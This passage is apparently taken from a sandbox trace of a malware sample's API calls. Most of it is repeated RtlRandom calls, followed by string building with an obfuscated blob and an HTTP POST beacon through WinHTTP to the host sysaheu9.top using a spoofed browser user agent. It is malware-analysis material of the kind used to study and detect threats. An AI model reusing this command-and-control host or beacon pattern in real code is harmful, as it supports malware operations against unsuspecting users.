Seed=0x2830e9e) returned 0xa2cfdb77 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x56cc85fe [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x42dd7dc6 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x968ba683 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x85bc5590 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa271cbb2 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4aba132a [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x59c24b4e [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5cf26b50 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf21b1525 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f4eaf1e [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb78da8d0 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7e72c3c1 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa5e5ca7f [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2485552 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3b492899 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8adca570 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbc881a77 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf72153f7 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfc7afd35 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xefed0775 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x541f428 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9b52c37d [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6a6ae09c [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb11c711b [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6187b7ca [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7d4e3edc [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3395972d [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x22512728 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x81874404 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xba7de015 [0318.045] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x23919f80 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe07d611d [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8254f205 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb5044646 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9bf4db69 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xde485360 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeed68c71 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x47beb04f [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf84de9c [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdf5285c6 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeaf9df28 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf5daa105 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x497f2575 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd8af6594 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x44c36a55 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9bfeb1d4 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1dced105 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x761d7085 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe5011b3d [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbf50298c [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50749e93 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9e586cd3 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9c31f3aa [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf899cff7 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc0ae194f [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x18fdfd4 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x79a38470 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3a7af799 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x94dc28e1 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfb8c344b [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6cc284f1 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbd62e574 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd805872c [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x74f32e0d [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x83323ad5 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x145674d9 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x80d2cb08 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbab79eb4 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf42d404c [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2699cd71 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x73c9541b [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe78fb3c4 [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaa410edd [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd151c14f [0318.046] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb50847c9 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbfe3293d [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x71a26fa [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1d471a63 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf793c892 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d09f3df [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd502bb1 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d0f5e5d [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc7e9395a [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8493efb6 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x56a0ef4b [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x44e4e28a [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdfe035b7 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfb2c5390 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcfb72b0 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb58d73e0 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xaef87adf [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4c85353 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x65d6a7fe [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x992dbc35 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x808b2bc [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8322a0bd [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcd75eba8 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x42312151 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb3e3fcd8 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x661cc4da [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc7db2b18 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xde92b774 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x53488cd3 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbf797003 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb52759f5 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe8b5289d [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d12c94c [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f8499a2 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x21a1ec [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x839b17f2 [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x96f412ec [0318.047] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7e675cf9 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf83e6a24 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x54d193c2 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9718d2ed [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa7ff1b75 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe1efd791 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x88624f4a [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x611ab289 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8082de4d [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8c22c6a3 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d261a06 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x602a73a3 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc347eb6f [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1a1690ad [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe028cd7c [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4a7a6e8e [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x323d8dfe [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc29ba0f7 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3a85a0d4 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb3ce8ccf [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8efe1d3c [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x696dbde2 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x895e1ae2 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7215ab27 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa22c2391 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb7437a85 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4e097127 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc3f4308e [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x445ff660 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6185d033 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2044bbbb [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeb6f9ee5 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf8e9e69f [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7810d785 [0318.048] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7cc41c08 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5b623235 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x38e69404 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1acaea1f [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d02c347 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9c30cd40 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x41314b12 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3616176b [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9a7fc2ab [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7c7ba8c5 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf09c64ad [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2ffd96b7 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x68f7f48b [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7fc8d967 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x65141223 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa79da62d [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x28d29d3a [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x836da476 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x20ad7f06 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x53670885 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4e51b1e0 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x72303ac9 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x1c964769 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x723d0af2 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd2cbe061 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3dac2dae [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5f547165 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x61bdc832 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdab28476 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x50a4764c [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x713dea5e [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd10965dc [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x166e7b79 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x31520e70 [0318.049] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2610f3f7 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbc03ca45 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf75ac932 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x241e29d1 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d983379 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcfd8f259 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfc81b0f3 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xea2aeaf9 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbf782f3a [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x38f9aec8 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x81c82931 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x47903d2c [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcecdc6be [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x810e3c77 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd63881d8 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf779e50d [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x12811d92 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xee258a81 [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x7942292f [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x411cceed [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe9aca1d [0318.050] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf3474f7c [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x610ff97b [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf6269b53 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9950d634 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9f1d8b5a [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xea1e2ee [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x503d7867 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x55227339 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc1a5854c [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x49041201 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdfe95e34 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3860ad23 [0318.051] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xae771472 [0318.103] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x11259ff6 [0318.103] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xedffb19 [0318.103] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6d40dfec [0318.103] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8ce5b4f8 [0318.103] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x405461da [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe60689fb [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbc52e7df [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xeae6e6a8 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x518de055 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe06a52fa [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x31468243 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa3499740 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3293bc [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xcddd8c18 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x613dbc8a [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d4010a3 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x32c58e06 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xe741deca [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x31132936 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x884febee [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3796078d [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x79fe0789 [0318.104] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd178c3bf [0318.104] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x152) returned 0x7d41980 [0318.104] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0318.104] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0318.105] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0318.105] lstrcatA (in: lpString1="", lpString2="$:6I(R'AOA&nAg\"g;E1;ZagL$OX5RvbNWns0AST/E^Avh+`G0T['YzHIp3zP`#TvQN&WQX$tl_gL2p9#Wzdkb(,:'Nq@:h9I&]Viy1PXORs4q4%%57hd>:M3IYo0_CFh\\K$nXMJxb)y;TeZq/3lhv>/IHHj04wdQ.z)K,\":M3IYo0_CFh\\K$nXMJxb)y;TeZq/3lhv>/IHHj04wdQ.z)K,\":M3IYo0_CFh\\K$nXMJxb)y;TeZq/3lhv>/IHHj04wdQ.z)K,\"O.+E(itC%5HlcQLaefy&s];Q)vCm32PU%U:%6*qZyx5EGw_P_of\\?$O,BdiY@/wuhXV5*Q&/Sh;$c(kd/VXR/N'[CfOso:'.5YVNxqWUuo>X=YaxlapgscJFV\"Dh=qLKwZ6t.@QBHx$R)U!3rKO!MS,kL\"H_X_<5rdA[Oi40BL)4.rv/o,9k3wu\\+[scW]2.+qbG9I;%ul>" | out: lpString1="t.6hW$=4(ZDi[S9Zn(A2;zrv^+PsvUh7b\"3awV>O.+E(itC%5HlcQLaefy&s];Q)vCm32PU%U:%6*qZyx5EGw_P_of\\?$O,BdiY@/wuhXV5*Q&/Sh;$c(kd/VXR/N'[CfOso:'.5YVNxqWUuo>X=YaxlapgscJFV\"Dh=qLKwZ6t.@QBHx$R)U!3rKO!MS,kL\"H_X_<5rdA[Oi40BL)4.rv/o,9k3wu\\+[scW]2.+qbG9I;%ul>") returned="t.6hW$=4(ZDi[S9Zn(A2;zrv^+PsvUh7b\"3awV>O.+E(itC%5HlcQLaefy&s];Q)vCm32PU%U:%6*qZyx5EGw_P_of\\?$O,BdiY@/wuhXV5*Q&/Sh;$c(kd/VXR/N'[CfOso:'.5YVNxqWUuo>X=YaxlapgscJFV\"Dh=qLKwZ6t.@QBHx$R)U!3rKO!MS,kL\"H_X_<5rdA[Oi40BL)4.rv/o,9k3wu\\+[scW]2.+qbG9I;%ul>" [0318.272] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10c) returned 0x7d41ae0 [0318.272] lstrlenA (lpString="http://sysaheu9.top/") returned 20 [0318.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7d41840, cbMultiByte=21, lpWideCharStr=0x7d41ae0, cchWideChar=42 | out: lpWideCharStr="http://sysaheu9.top/") returned 21 [0318.272] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1026fc18 | out: pProxyConfig=0x1026fc18) returned 1 [0318.297] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xac7a1c0 [0318.297] WinHttpCrackUrl (in: pwszUrl="http://sysaheu9.top/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1026fcd0 | out: lpUrlComponents=0x1026fcd0) returned 1 [0318.297] WinHttpConnect (hSession=0xac7a1c0, pswzServerName="sysaheu9.top", nServerPort=0x50, dwReserved=0x0) returned 0x8773d80 [0318.297] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d41c00 [0318.297] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x68) returned 0x7d41c20 [0318.297] WinHttpOpenRequest (hConnect=0x8773d80, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa9f01f0 [0318.298] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x4e) returned 0x7d41c90 [0318.299] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x10d) returned 0x7d41cf0 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x37e2cc33 [0318.299] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x12) returned 0x7d41e10 [0318.299] RtlAllocateHeap (HeapHandle=0x7d40000, Flags=0x8, Size=0x17) returned 0x7d41e30 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x782e12b1 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3672a7bf [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xbc4eff6a [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8d2b7de6 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f509cc0 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xb9444c33 [0318.299] RtlRandom (in: Seed=0x2830e9e | out: 